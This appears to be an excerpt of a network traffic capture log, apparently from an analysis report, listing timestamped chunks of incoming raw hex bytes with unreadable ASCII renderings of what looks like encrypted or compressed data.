                                                                  2022-07-15 01:58:20 UTC3090INData Raw: fc 51 81 b8 42 a5 4b 97 f3 b6 08 55 e2 5a 2f e9 56 ca 2d 95 27 31 44 45 9b 22 b9 be 47 87 dc a4 bb 88 3e cd 95 ff f9 e8 6c 73 c7 59 0b a3 0a f8 05 a4 55 22 8b 0f e8 57 8c a1 2b ef 2c 48 75 c5 67 d8 a0 19 c2 0a 57 c5 5c aa e0 4f 82 64 af 4a d6 91 01 2f 74 30 44 50 6d 64 f0 94 fd 8c 04 2d 55 be 9d 6d d9 57 09 70 bd 4d ee 75 2b 1d 07 3d d2 da 6c c6 d9 3e 96 e5 28 0e 6a a2 71 7a 4f b9 cb 1c 95 cd d5 22 63 c8 97 ac b5 c0 38 7b b1 c3 da 66 7a 64 6f 60 c8 bd 44 35 cf c4 d3 41 ed e2 6d a8 6b 0b a2 16 c4 56 46 58 f1 3a 04 41 a7 7c 26 d3 62 29 cb cf 7d 18 9e e2 ad f4 b4 60 28 91 44 32 0b 13 97 9a 61 92 55 d1 05 74 c6 4a 72 68 61 96 ca 1d 50 dc 77 bd 3e 18 14 93 5f f8 63 a6 2a ac 0c 1f 34 11 2a 36 7c d4 1c 1f da 58 04 9c c3 34 1c cf e8 4a 3a 28 c9 10 2a 77 6c c4 e6
                                                                  Data Ascii: QBKUZ/V-'1DE"G>lsYU"W+,HugW\OdJ/t0DPmd-UmWpMu+=l>(jqzO"c8{fzdo`D5AmkVFX:A|&b)}`(D2aUtJrhaPw>_c*4*6|X4J:(*wl
                                                                  2022-07-15 01:58:20 UTC3106INData Raw: 72 51 f4 63 14 2b 7a 7c bf 48 27 62 d7 27 47 86 7f 19 b8 a7 f4 5a b9 3c 8c 7b b1 dc 42 fc d6 94 33 de c1 7b fd 2c 31 ab 17 56 e4 e9 27 46 44 86 1d ba 8b 68 2e 4c ec d6 0e 35 71 ba 89 98 b3 40 86 0f c5 cb 3f 2f 8c f9 45 c1 d9 54 bd cc f4 60 cd 6f 72 09 4a 38 76 be 08 77 41 d5 75 f2 e4 9b d2 26 dd 48 3a e0 33 d3 2c 35 ad 16 df 3f 90 28 8b 85 c8 23 cf 8a 9d 3b a9 c7 6d b0 fc 76 67 e1 e8 e5 bf 5b 62 a3 eb fc 13 4e 14 2a 26 a9 02 08 08 3e 09 1f 5d 53 f1 34 4c b9 65 bd 70 27 5f 90 41 94 07 bd 1d 4c f9 25 30 f1 45 fa c1 0e 67 de f2 70 6b 29 2d 44 81 3e c1 cc ba ae ed d2 a6 c6 00 b2 ef d0 58 25 65 7b d4 70 65 c0 7f 26 9c 85 82 ad 8b 84 0a a5 ee 97 0c 23 15 0b ee 16 92 01 5f d6 e1 b2 4e da 2b da 44 a8 66 44 11 02 10 ca 28 73 95 c6 89 3f 73 17 0d fd 01 b1 4b f8 51
                                                                  Data Ascii: rQc+z|H'b'GZ<{B3{,1V'FDh.L5q@?/ET`orJ8vwAu&H:3,5?(#;mvg[bN*&>]S4Lep'_AL%0Egpk)-D>X%e{pe&#_N+DfD(s?sKQ
                                                                  2022-07-15 01:58:20 UTC3122INData Raw: 17 13 4c 9f 35 c7 0d 16 8d d7 f8 2b 6f 84 8b 00 24 11 36 90 63 ed 6e f2 75 2e 38 3e 2a c1 40 d0 0a 12 57 a4 28 f5 a0 ed da 19 67 99 f0 10 11 98 b2 76 33 a3 2d 2f a2 b4 6b 43 c9 a3 54 94 27 75 83 1e c3 63 6c b7 5d ea 3b 39 7c ca 2a d0 03 54 5b a5 09 d8 19 aa a0 19 e2 93 4d 52 39 ce 1f 51 92 2f 74 9f 3b 28 e5 c6 a6 5f 33 4e 68 b8 dc f7 bc 8a aa d2 e3 bb 30 6d 8b a8 93 b9 63 8d 3f 64 3f cf 58 92 1d e9 aa 3b fa 56 47 6d f5 10 4b 38 ed e1 98 7b f6 db 06 0d 8f bd d5 d6 6c 70 a9 9b 2b dd b0 15 39 4d 1e 7a cd 27 cf 75 67 ab 3d b1 bb 78 b4 91 de 42 17 9b e1 aa 15 a6 ec a2 4f 0d 66 6e a9 99 b0 6b 22 7a f3 3e 30 cb eb f6 17 39 82 94 0a d5 0a 72 bc b1 dc 13 1f d4 ec a5 b0 ec 62 19 04 9e 7c df 2e 27 d3 d3 5e 06 42 59 89 0f 4f a5 d3 05 80 90 95 e8 81 9d 00 40 f2 13 62
                                                                  Data Ascii: L5+o$6cnu.8>*@W(gv3-/kCT'ucl];9|*T[MR9Q/t;(_3Nh0mc?d?X;VGmK8{lp+9Mz'ug=xBOfnk"z>09rb|.'^BYO@b
                                                                  2022-07-15 01:58:20 UTC3138INData Raw: 93 4f a4 c7 56 92 69 c7 bd 70 1c 37 83 e6 28 77 38 58 51 6d 77 4a 1e 02 f8 83 e8 5f 2d 8e 5a 18 92 9d a8 f2 09 78 28 2f f2 cc 4f 02 56 c7 03 33 af 9c 05 15 6b e4 7f 3f 18 49 3b ac 41 45 0a 78 62 65 8f 8e 08 5f 78 6c 30 50 d2 17 7a b1 ec b2 d6 b6 bc 39 ed 67 a6 45 84 94 37 fe 50 b5 3d 84 18 44 9f d2 97 18 2f 57 03 ee 73 78 b3 6a 8b c1 9f d2 45 a2 2b 44 4d 0d c0 56 f7 20 b7 75 56 d1 2d 59 33 9a d7 e5 de 4b 0b 5d d0 85 3e 68 71 ed f3 e7 39 3a 90 11 73 e4 be b5 9d ee 85 68 d4 66 06 2a 0f 28 3a 3c 3a ee e6 5c c2 1e 4f db df 20 a4 ff ba 8a fe f6 84 8d 33 4e 63 06 e1 0c a3 28 47 cf 58 69 10 40 ac 70 1d 5b 6c b6 ed c6 45 3b 7b d9 5e 8e 1a 19 f8 43 fd 62 23 49 fc c2 b8 7a 3d e6 f0 e8 cb 9c d1 3e fa 9f 33 27 b7 40 48 31 b6 8c 49 fd 75 f6 f3 0e 90 89 cc 3d b2 c7 00
                                                                  Data Ascii: OVip7(w8XQmwJ_-Zx(/OV3k?I;AExbe_xl0Pz9gE7P=D/WsxjE+DMV uV-Y3K]>hq9:shf*(:<:\O 3Nc(GXi@p[lE;{^Cb#Iz=>3'@H1Iu=
                                                                  2022-07-15 01:58:20 UTC3154INData Raw: 1a db ad 71 ad da c1 77 d6 4d 95 a0 4a 7e e9 43 9d 59 3c c4 bb 88 d9 53 2f ff 3a 1d 16 80 96 18 e8 52 f9 e5 ab d0 3f a6 87 7f 86 63 50 42 31 55 df d3 89 c8 d9 49 95 22 80 3c 96 43 45 15 77 64 30 6d 16 a4 d8 b0 a4 89 ea 66 df 80 ee 38 c1 67 18 96 8d 17 b5 d2 d3 7a db d1 af 05 ce fa 16 80 83 49 e8 65 01 b1 11 72 06 e6 ef e8 d8 15 91 8d b4 28 0d 5e b5 32 6d 95 70 a5 c2 3b 56 39 af 87 da 17 07 5c de b3 1d b9 ba 53 c7 38 94 0b ae a5 f9 b8 b6 b0 81 96 5a f5 af ad c3 8c e6 3e b7 4a ae 90 6a 63 7f c6 b9 be 31 d9 4c 6f 26 81 c8 5e 58 dc 36 09 1d 08 98 97 d6 b9 49 1e 61 d0 9c a5 e5 d4 5c 12 15 e2 d9 99 58 dd e4 d2 c3 8f a2 b9 31 51 ba fa 13 e0 e2 a6 53 77 94 c1 b7 6e a6 1f e9 d7 27 65 b9 ce dc f6 37 3f 50 d0 d4 e5 57 59 6b e8 a9 60 e8 35 b3 6b 49 fc cb 47 98 ea 88
                                                                  Data Ascii: qwMJ~CY<S/:R?cPB1UI"<CEwd0mf8gzIer(^2mp;V9\S8Z>Jjc1Lo&^X6Ia\X1QSwn'e7?PWYk`5kIG
                                                                  2022-07-15 01:58:20 UTC3170INData Raw: 5a 83 01 cf 0e 73 40 42 7a c2 9e f9 7c d3 6d 68 31 ea 6a 07 a8 74 12 42 11 21 37 49 13 02 87 72 2a e4 f2 5c 40 64 19 9b e4 00 13 58 53 ab 86 24 8b 72 9d 76 8e 44 76 31 e3 c9 e3 b7 c3 08 b5 13 b8 3f 10 ac 0c 2c ab df fc e9 d3 c1 53 cc 01 4b f2 42 40 90 18 49 96 21 b3 af 3b d6 cc 05 69 e6 6a 3f 63 f7 b8 ee 88 c4 14 6b b8 d1 64 83 75 b6 ba 26 ce 31 b0 33 b1 c6 13 b8 6d be e8 10 7b 63 a0 68 81 e6 8d 09 63 26 b7 3b 46 ed 87 07 d0 48 07 02 ac a7 ea e8 2b 24 39 f5 38 bc c5 b2 ac fd 24 fc 4a 74 34 e4 b6 b7 bd 95 b2 1f 19 ba e8 33 17 70 bd 04 9c 53 82 24 a0 90 72 a2 6c 20 ef 0d 30 ed c9 bc b5 01 6f 3a 52 06 50 31 55 7e 8c d4 38 f0 75 ed 83 88 55 b8 44 6a e3 67 73 8c ea 02 1c 6a 28 11 84 fe de 45 f8 f3 73 94 0a 6f c9 c6 0a 0a 3b 76 bc e4 0d 97 e4 67 95 24 ff 36 cc
                                                                  Data Ascii: Zs@Bz|mh1jtB!7Ir*\@dXS$rvDv1?,SKB@I!;ij?ckdu&13m{chc&;FH+$98$Jt43pS$rl 0o:RP1U~8uUDjgsj(Eso;vg$6
                                                                  2022-07-15 01:58:20 UTC3186INData Raw: 58 c8 f5 f4 3d 2a 3f aa ac 88 c0 31 19 ef 8f 7b 77 c7 68 43 9e 3e 88 07 5c ac 28 98 c7 31 5f 70 7d c2 ee cf 48 d7 3e e6 58 6c be ad 87 35 2d df 87 b5 2b f3 6f 5a 4a a2 a4 c1 d3 a8 ac 1b bd 17 f4 72 35 89 b8 56 ff cc 1c 03 1c 41 c1 64 f8 63 9d 6b 0b 51 6d d5 31 84 82 8a c8 ba a9 9f 17 eb 4d 04 cd 24 2c f2 32 04 db b6 ce 99 9b c6 93 17 06 3d 2e ef 01 14 32 fd c0 97 44 f1 92 82 ae 30 63 bd 81 76 68 7d 29 e7 f0 3b c1 15 ce 66 3e 6d 95 6d 39 d1 c4 f7 20 f3 53 f3 3d 4b c6 b8 80 6e 68 25 e0 23 41 0b 35 ed fd 18 e3 00 54 c9 5d 69 a2 b0 29 72 77 99 31 b5 06 37 f2 0c 39 1f a0 32 7c e4 77 5c da cb c6 ce ae ba 41 a0 9f c4 45 d6 27 66 52 44 4a ce 92 67 a8 9a 94 37 8d c8 9f e3 1b df a8 72 2b a8 8d 65 b5 d5 75 f4 f1 f4 c6 e8 87 21 99 77 53 a9 8a 10 0e ee 95 5e 42 18 f2
                                                                  Data Ascii: X=*?1{whC>\(1_p}H>Xl5-+oZJr5VAdckQm1M$,2=.2D0cvh});f>mm9 S=Knh%#A5T]i)rw1792|w\AE'fRDJg7r+eu!wS^B
                                                                  2022-07-15 01:58:20 UTC3202INData Raw: cd a9 38 32 13 c0 d8 81 75 95 48 6f 22 34 23 5b 5c 23 d2 a7 af d3 63 09 d7 9d 59 e9 a5 db 0b de db bc 70 18 6e 7a 84 40 c5 b1 e5 d3 eb 17 a9 ab 37 9d b9 46 a7 6d ac ac d6 81 7d 43 24 cf 07 07 b6 81 ac e0 41 26 f1 e2 97 91 0f 4b 92 df 16 79 6b 5a 54 ce 9c a1 eb a2 77 fc 2a 48 a7 b4 cf 47 3d f1 59 93 af 59 87 c4 9f 65 a7 1b 30 6a 45 56 52 78 35 64 7a eb 8a 2a d9 2b 44 93 50 cd bc b0 bc f1 dc 2d 14 ff 94 c4 59 7e e3 91 d4 a8 68 43 89 0b 16 32 13 42 79 c8 d1 9b bd 94 3d 60 e6 63 2d b8 c4 82 a4 df 09 f4 f4 a1 0a 31 cf 53 d8 25 92 8f 0c ae d3 e5 69 21 0e 53 53 2a cc e1 d7 78 bb 90 07 9f 72 26 82 40 e3 59 de f0 fc 45 1d 99 b2 45 45 f6 10 9e a4 80 20 14 3f 7e c2 51 9a aa f6 ac b5 b7 d0 6e 9e 71 29 10 0c 87 60 9e 38 9a cb c1 d5 93 e8 4e 5f 43 b6 06 6d 33 6c 97 fc
                                                                  Data Ascii: 82uHo"4#[\#cYpnz@7Fm}C$A&KykZTw*HG=YYe0jEVRx5dz*+DP-Y~hC2By=`c-1S%i!SS*xr&@YEEE ?~Qnq)`8N_Cm3l
                                                                  2022-07-15 01:58:20 UTC3218INData Raw: d4 48 88 2c 34 2f 11 08 ec d4 21 8b d5 69 af cd 81 6e 0e 7a 90 15 e5 70 56 8f 63 96 e0 2f f4 75 49 f5 7b 0c e8 19 e5 b3 82 91 ab c7 fe be 77 a7 58 76 a4 d6 0c 14 98 38 9e 02 c9 17 dd c6 ab fe 30 39 06 32 0c 88 43 ac 68 dc 18 18 33 3d bf aa 0e f4 37 64 f1 c1 62 c6 ee b1 e1 27 c7 32 e5 6f 15 fd 63 06 08 17 c9 0f 62 e4 be c9 db 9b a6 40 54 38 a9 d4 6f 22 97 36 8c 61 da 8c 0d e4 02 ac c9 db 29 1b af 3e 94 cd b6 68 36 30 54 97 1d c3 78 32 46 a7 89 ed 0a 91 27 c6 a3 c6 05 90 cd 01 13 fe 7e fa 65 63 4a 6a ba 32 56 86 5a 70 d5 6e 5e 6f c9 70 a4 9d 36 94 4e bc c1 fe 97 48 bf b2 f1 60 89 1b 0b 64 17 f8 d1 98 eb 52 45 51 c5 d8 7f 56 50 c4 05 b5 1f d8 f8 53 f3 d7 c7 26 57 75 83 4d ce d1 d8 2b be 22 64 d7 38 82 b2 01 45 f1 1f 74 d4 d2 ec 40 02 ef 9c a4 8a ac 41 63 f5
                                                                  Data Ascii: H,4/!inzpVc/uI{wXv8092Ch3=7db'2ocb@T8o"6a)>h60Tx2F'~ecJj2VZpn^op6NH`dREQVPS&WuM+"d8Et@Ac
                                                                  2022-07-15 01:58:20 UTC3234INData Raw: 30 41 6e 15 f2 37 ba b9 8b 93 5b e6 9d f7 6e 77 77 76 3c bd a5 1a 06 10 84 13 0f 14 d3 42 08 b2 0b d9 e3 57 7e 82 90 29 78 ee f4 9a 6a f9 e5 f6 1a dc d6 b4 67 24 ed 0d fb c6 b2 53 96 f3 a6 79 f2 5a 29 34 c4 d2 62 38 2d fb 35 c5 36 e5 fd fc 07 6a 03 61 06 b1 7d a9 e7 07 c3 97 3d 14 4b 9c c0 af 8f 64 bb 3f 84 8d f4 17 0a af db 10 69 58 0e 69 6f 2d cc 9e 5e c1 8f cb 67 a3 54 66 38 7d af 37 9a 92 c6 0d ea 3d b0 38 9c 1e d0 ba 23 24 a0 62 d9 ed 05 93 cb 50 eb c9 81 d4 8f 59 e3 0e 84 a6 7e c6 b2 5b 06 77 a5 23 bc b8 0c f0 8f 6f 8c df 1e 07 02 53 bf df c7 dd 6a bc 85 3b 2a 0a b5 04 90 a8 1a 27 c6 ae 9e 46 cf a9 e0 cf bf 97 c9 fb 41 f7 56 6d c0 86 c1 74 eb 2c 50 47 c4 26 ac 9d 1d 54 05 a5 8b 54 14 c1 14 60 ed 27 17 cf a0 18 be e3 d8 ab b8 51 d5 bc 45 60 29 fe fe
                                                                  Data Ascii: 0An7[nwwv<BW~)xjg$SyZ)4b8-56ja}=Kd?iXio-^gTf8}7=8#$bPY~[w#oSj;*'FAVmt,PG&TT`'QE`)
                                                                  2022-07-15 01:58:20 UTC3250INData Raw: 7c 34 76 45 56 fe ea e4 41 b5 ee 53 72 0a ea 33 21 bb 9b 39 c0 48 d3 7d e1 91 44 6f eb c7 bc 48 7c 0b 51 0d f8 3c 61 a0 2c 43 cb 92 52 b5 de 31 2f dc 5a ee 5e 3e ee 5e e4 80 37 80 ff 2b 30 22 27 f9 d2 d9 f0 91 0c 73 a4 11 eb 8b 91 6c 26 2f da 2a 56 97 e1 b9 44 03 93 b1 24 57 d8 9b 5e fe 83 b9 40 a3 11 0b ce cb 21 3e 2e 49 3a 73 77 ec 14 bf 06 65 22 d1 e1 e1 20 3a bd 2b 51 f3 5c 76 03 3f 42 db b2 a9 b4 36 18 ca 11 3a 54 ab c5 54 62 02 ad 84 0b cb b0 b4 0f 94 e1 87 41 28 7f 12 05 ca 55 80 cf bd 77 56 9d 87 08 1c 93 15 38 7b 85 09 8f 38 18 e7 e1 d6 70 99 54 57 46 4e 40 38 c3 14 e5 2e 17 81 60 cc 08 f4 f2 11 bf b0 41 51 d4 7e e8 c1 6c a3 2d f1 3e d1 bf b5 6b fb 5d 96 fd 21 8e 8e c1 8b 8d 50 47 9b a3 3c b5 ae 18 46 80 19 c2 06 60 c7 0c 5d 1d c8 fc 46 b6 ae 34
                                                                  Data Ascii: |4vEVASr3!9H}DoH|Q<a,CR1/Z^>^7+0"'sl&/*VD$W^@!>.I:swe" :+Q\v?B6:TTbA(UwV8{8pTWFN@8.`AQ~l->k]!PG<F`]F4
                                                                  2022-07-15 01:58:20 UTC3266INData Raw: be 52 aa 90 3b c7 7c 1f 1c 38 37 67 72 bb e0 ed 48 92 f9 5a 1c 08 4c ec 73 2c e1 4d 63 db 14 28 fb c5 2b 17 db 5a 0f 38 ee 4a ab 28 8b 05 a0 60 87 69 82 4c 17 6c 89 b4 95 0f cb 75 d1 7f 44 0c d1 46 4d e9 cf 2e 9e 32 9a 0f 27 57 de b6 af 1c 02 e6 10 c9 b3 a8 64 86 67 c6 d6 67 8b 5d 0a 92 78 24 f6 cd 57 63 c0 69 95 5b 03 86 f8 57 c2 78 d4 d2 40 1b 58 2d eb 6b da 74 2d fd 80 40 b1 59 58 e4 56 99 a9 b0 88 b2 e0 2c 79 83 a2 e3 d7 4b 8c 8b 46 55 eb 9b 61 c5 11 cc 8c e8 4e 01 a1 6f fe 09 32 d9 7e 63 28 96 45 e6 54 3a 41 3f 8d fd b7 3b 68 c9 cc 78 5f 9a b1 2e 33 7e f5 1a e3 83 36 a5 9e e3 1a ab f7 52 62 9b db 5b ee 35 4e 77 b6 3b ff be 5b fc 48 6e a0 91 5d bb 53 ac f1 fe d5 1f d6 a3 fc 71 19 04 17 b6 47 7a dd 0f bf 94 97 f8 e8 c1 94 43 22 c8 6d b1 ca bb bb d6 af
                                                                  Data Ascii: R;|87grHZLs,Mc(+Z8J(`iLluDFM.2'Wdgg]x$Wci[Wx@X-kt-@YXV,yKFUaNo2~c(ET:A?;hx_.3~6Rb[5Nw;[Hn]SqGzC"m
                                                                  2022-07-15 01:58:20 UTC3282INData Raw: 2a c0 49 b5 d4 69 0e 7b 36 fc a4 21 77 0a 0c 0c 37 6a df 58 06 ce 40 05 a8 a7 c0 22 0b 51 1e 5d 10 8f eb f2 95 c1 88 78 eb 0e 35 5d 8a 62 37 01 94 e5 53 fc 71 b2 7a bf 94 58 5c 74 bd 82 b5 12 31 1d b8 bd 6f 0b f0 e1 e7 e0 92 3d 8c c4 a0 d0 aa 55 e3 2d 20 31 55 2a 6b ab 09 e1 d5 15 89 ad 4e d8 49 da 78 18 78 ff b2 ef dd b6 a5 e5 a4 72 ac b6 70 a3 0e 89 56 f2 ca 3c dc 98 5f f4 3c c9 8d a7 a1 e5 98 3e bf 14 fe 25 5e 35 f0 24 44 88 90 b1 67 34 e9 5c fd 39 6c ad f8 95 b1 f7 23 c7 b2 db 15 a5 ab 9f 83 15 11 32 70 c0 7a 4d 19 b0 46 d1 62 59 eb 79 87 b9 64 28 2c 71 0a c7 d4 a0 e4 b4 4e 13 c3 78 a3 3b 52 43 20 fe 0a 65 b7 bf 64 80 85 3c e5 57 ac 23 75 83 41 b3 ea d4 c5 62 d7 5f c0 e0 f3 3e 3e 79 df e1 e8 40 a2 bf 25 78 9c 57 70 d0 80 58 70 a9 50 6f 75 cc fc 63 8a
                                                                  Data Ascii: *Ii{6!w7jX@"Q]x5]b7SqzX\t1o=U- 1U*kNIxxrpV<_<>%^5$Dg4\9l#2pzMFbYyd(,qNx;RC ed<W#uAb_>>y@%xWpXpPouc
                                                                  2022-07-15 01:58:20 UTC3298INData Raw: 43 ce 4b e1 1e e7 a4 fe 2b be 51 4e 83 4f c8 87 68 c4 de e9 bc b6 ce e2 04 0b 8f 8c 81 ce e3 fc f9 ca 10 1f ab 55 42 e7 ba 55 e7 e8 60 a6 c9 f1 ea ca 4f df 82 17 03 63 48 09 cc bc 60 53 e9 6e 5c b6 4b 00 26 7c 9b b6 a0 0d ee 6e ac 20 e7 c8 25 fb 65 2b c3 e6 97 65 e5 df 68 02 27 a7 23 6f ab 14 a3 29 4d 49 4f 54 14 49 f0 c1 a8 6f 73 1d b8 21 8e 2d c4 44 60 2a 99 5c 40 a9 0a 6f 24 16 80 d7 98 fe ca bc 5d f9 da b5 bb 3e 5b d3 e2 de ae 1e 50 dc e1 06 41 7c 86 84 2b e7 ea fa f4 65 94 58 ae 31 40 2c bd df 57 05 6b 07 55 7f 64 54 e8 47 37 65 52 5c d5 ab b2 c7 af 2c 27 89 53 54 f0 94 9a 3f ea eb 43 58 81 e6 31 a0 b0 89 56 5b 72 e3 9d 7d 19 dd 72 c9 16 b1 77 e4 be ca d9 93 ac 7e 29 84 80 ae e6 55 f4 3b bb d4 6f 53 7e 99 69 f3 d6 a2 91 32 5f 1f b2 60 5c 7d 56 d0 31
                                                                  Data Ascii: CK+QNOhUBU`OcH`Sn\K&|n %e+eh'#o)MIOTIos!-D`*\@o$]>[PA|+eX1@,WkUdTG7eR\,'ST?CX1V[r}rw~)U;oS~i2_`\}V1
                                                                  2022-07-15 01:58:20 UTC3314INData Raw: 89 6e 52 b8 2b 9d 3f 18 8b 39 5b 77 24 ee ec 16 d9 3a fa 41 7b ae 67 0f a0 ee 15 a4 88 97 b8 13 60 ac 2b a6 d9 cf 54 d2 14 9e f8 eb 6e ac 0c c1 e6 e9 94 15 7d db bc ce dc 41 54 b9 e7 31 60 f4 07 47 8c c6 cf 99 72 74 8f b7 2e b1 9e e4 3d 16 1f 13 b3 21 a6 e0 80 a8 fd a1 d2 cd 91 fd 74 39 4d 9a 6e b8 60 b6 60 f0 e7 08 dc ee 49 d3 02 26 f9 e7 6e 17 de da 7d 2d 5c 67 bd 40 bf 4d 1d 8f 15 7b 0c 9c d4 ad c9 8c 1c d7 2b 85 d7 3d cd 81 80 5f e8 99 09 af 06 7a 02 3d ae c9 81 f1 d6 de fd 59 24 df b8 ee 3a 3f 30 17 68 d0 bb b3 31 31 bb 01 93 58 75 65 43 a9 29 8a a5 66 23 fe 2f d3 0e 5e fd 0e e8 33 64 e4 c2 3b 08 9e 04 80 ec 4a 32 68 1e 44 98 71 ad 22 6a fc 2d e3 d6 b7 39 4e b9 9b bf 20 67 58 ea f1 03 f9 60 5f d2 60 85 54 11 51 6c 0a 4c 64 27 28 8b 7d 4f 6a 33 70 10
                                                                  Data Ascii: nR+?9[w$:A{g`+Tn}AT1`Grt.=!t9Mn``I&n}-\g@M{+=_z=Y$:?0h11XueC)f#/^3d;J2hDq"j-9N gX`_`TQlLd'(}Oj3p
                                                                  2022-07-15 01:58:20 UTC3330INData Raw: 80 7e 75 56 f2 65 a5 a9 d3 d6 63 af 9b 33 89 9b 6f 09 9e c6 73 08 9f 37 71 52 28 46 12 bb 3c fc 20 90 12 9b 8b ad 9d 4e 98 2a fc 4a 5b 6c 68 5e 20 1e b5 c7 66 67 de a9 2a 37 bf 3a de 44 d6 78 33 62 94 ff 88 e3 0c 1a 66 bb 4d 6c f0 a2 4a 40 67 89 ae 17 ff ae a1 10 f9 22 55 62 a4 44 7e f2 e7 89 e8 ab b4 7f 25 29 73 93 4e d1 3d 9a 8b a1 63 db 7b e0 49 f4 ec c2 6a 81 af 64 66 4e 64 2c 93 e5 4e 66 45 c7 58 e8 77 e8 28 9b d5 e5 6f c9 58 bc fe 66 1b 78 9f 21 54 25 ce bb 70 ce 02 0f 90 84 2c 9f d7 ec c7 88 64 22 8a 6a 4b ed ba b9 a1 1b 7a 45 12 3d 04 c3 4e a3 28 aa f1 61 55 81 98 6e 2d b0 8e 4a 81 92 1a 97 4a ca 17 1a a8 83 1f 27 a8 ab 6b f0 f8 60 9d 0a da 52 5a 8c b9 8d 4b 8e f2 21 5f d5 49 74 2c 54 e8 1e e2 fe c7 b2 dc 36 d6 60 e0 9e 7a bf 33 f3 11 5b 15 2f 2d
                                                                  Data Ascii: ~uVec3os7qR(F< N*J[lh^ fg*7:Dx3bfMlJ@g"UbD~%)sN=c{IjdfNd,NfEXw(oXfx!T%p,d"jKzE=N(aUn-JJ'k`RZK!_It,T6`z3[/-
                                                                  2022-07-15 01:58:20 UTC3346INData Raw: b9 4a 55 a9 62 4e 0d d4 da 9a c7 3a 28 e0 70 96 bf 14 eb 6c 6b ba 13 df f5 64 68 ac a8 de 67 db e9 d1 40 4a bf a5 16 a3 6d ba a0 40 fa ab 0a 4c 0f 50 92 e5 11 ee 11 93 97 dd d0 3d 65 5e 4d 28 65 08 54 de 33 06 41 87 40 c7 9f 7c 98 5e 69 bd 8a f3 69 72 37 f1 2e f1 9c 6a 94 f6 3a 3d 84 72 4c 7c 27 46 90 9c ec 9f b4 62 b9 3d 0c 9f 99 16 3b 68 d5 59 94 dd d5 39 64 e9 8b 94 04 1f ec 7c 93 35 1a 6d 0d 23 6d dc e4 06 d0 41 6e b1 2c 70 92 9d 6e f4 49 85 9f 7a 78 29 3e 0d 30 78 51 43 bf a8 32 64 ea 5e af d1 54 56 e7 71 9e db a0 94 34 60 8a 22 06 b6 3f c1 2b f4 71 68 a6 c3 e7 39 3e 61 a9 10 dd 7a 78 41 35 0f db 35 b0 0a 17 4a 9f 64 36 3d 17 23 59 dd 1a d7 ce 12 23 a7 00 88 6d 61 9f 2e 1a e7 91 d6 c1 3e cb ba 3e 80 d9 41 97 21 50 e5 0b e6 a2 9a b7 c9 8d 91 e6 ee 60
                                                                  Data Ascii: JUbN:(plkdhg@Jm@LP=e^M(eT3A@|^iir7.j:=rL|'Fb=;hY9d|5m#mAn,pnIzx)>0xQC2d^TVq4`"?+qh9>azxA55Jd6=#Y#ma.>>A!P`
                                                                  2022-07-15 01:58:20 UTC3362INData Raw: 34 12 a2 14 cc 06 0d d6 20 5f a8 29 d3 32 8e 7b a4 63 e9 07 04 5f 58 f8 24 f6 5e 2d c6 2a 6b 04 1a 4f 02 68 9d f3 da 02 96 b3 aa 42 8f 49 ec 7d a1 36 6b 3e 8a c8 cf 99 e9 27 0a 97 75 70 35 17 2e 9f 86 87 f7 60 ad 4e ad 33 3f 8d 6b b2 44 29 d7 09 c9 70 fb 35 30 39 0d 52 50 03 fe 42 82 e7 63 5f b5 f0 73 27 ce f7 12 a1 a6 52 ff 16 e4 47 ad c3 64 c2 2d 5e b7 3d f5 d7 71 f2 17 29 db a3 6d 11 97 79 dd 28 fd c7 2a 80 45 fe ee 22 80 8d 97 bf 69 47 2c 4a 07 c9 6d 2a c7 2d 85 e8 22 0d 4f 86 be f2 d9 67 a6 9b e9 d0 49 9c a2 52 c0 39 5f 21 77 db 68 f1 67 55 69 ec 78 da 21 02 59 55 f5 e1 9c 8c fe 48 81 2c 0e 5c e6 1e 69 ac 6c 48 ef e5 0f d8 58 93 b5 57 7f c9 35 6e 6e 32 f8 2e d1 e3 56 f1 0e 08 cc 41 3a e1 fb 14 68 8d 6d f2 8c eb 48 ab bc 70 78 dd 52 0e e2 f9 e3 15 11
                                                                  Data Ascii: 4 _)2{c_X$^-*kOhBI}6k>'up5.`N3?kD)p509RPBc_s'RGd-^=q)my(*E"iG,Jm*-"OgIR9_!whgUix!YUH,\ilHXW5nn2.VA:hmHpxR
                                                                  2022-07-15 01:58:20 UTC3378INData Raw: 04 75 84 da 34 19 a5 85 5d f6 fa 2c 44 39 49 d0 f5 6c 54 db c1 02 64 ca 19 84 cb 0c c8 a0 93 c2 1d 1f 6e 15 af 84 cb cd 99 7c 53 53 c7 af 3b 78 de 46 05 16 90 1b b5 02 7f 72 80 6d 50 dd c3 ed f6 f3 f5 ff e5 45 a9 92 6c 65 e4 2a 92 87 69 5e 65 f8 07 a5 d2 d5 b6 ac 0e d9 9e 47 6f 4e 72 c2 80 e3 6f 59 9a 1b 18 94 5d 29 2a a2 f7 f2 f1 5a 8b 45 b9 a8 1c 53 1a 08 4e c4 70 bf 87 76 03 9c 9e 5e de 25 18 6c d0 15 e7 e3 6c bf 08 09 89 0a 26 74 a2 7a b7 c6 83 cd 4e 4a 95 96 f1 a7 fa eb c3 b5 f8 db 68 32 d2 63 91 70 c8 10 0b 84 52 49 78 6b c3 25 e2 11 6e b4 04 f9 9c 85 bd 9c 0e e4 f2 ba 40 2a ec 7f 2c 1a e6 02 83 b3 34 f0 69 0e 75 13 49 c0 08 23 40 be be c6 bd e0 79 01 e8 f9 21 ef d1 c2 fb 32 a9 e1 45 bc c9 05 e3 14 11 58 95 db 02 6a 61 ef ea e0 b5 1e 45 e1 5c 62 43
                                                                  Data Ascii: u4],D9IlTdn|SS;xFrmPEle*i^eGoNroY])*ZESNpv^%ll&tzNJh2cpRIxk%n@*,4iuI#@y!2EXjaE\bC
                                                                  2022-07-15 01:58:20 UTC3394INData Raw: 2c 56 77 4f 71 b7 75 11 8e b3 89 80 1d 56 0a c2 d7 fa 58 dc a3 9e b9 f6 12 56 70 4d 50 a3 72 2a d9 4c 5c 1d 02 90 bb 4a 76 78 d9 03 a4 a0 97 86 eb 1a 83 ce bf 15 c4 09 e5 dc c0 23 eb ca 24 fc ae f3 11 c5 e1 6c 26 44 4f b6 f2 ba fe 7a 64 ef d1 fd 86 02 41 f5 96 1a 72 c9 b8 9f 4f 79 6f d7 ef b3 90 e3 b0 35 35 90 57 aa a1 e5 e6 2f c3 9c d2 6f 87 48 34 75 18 0d 99 9e 31 41 b4 14 48 84 7c da 63 9b a1 66 b4 47 f4 b2 31 8b 1e 89 26 65 70 a4 59 db ae 8e 8f b3 2d 91 b8 d2 05 52 81 8b 8b f0 bb 7d 0d 84 9b c8 6b f7 75 5a 0a d9 57 9c db 6a ac 96 18 aa 5e 85 0f cb f9 83 0a 63 0d ce 7b c0 91 42 da 57 a5 4b 47 2b c1 fc 0e 56 7e 94 82 c7 2d 4a 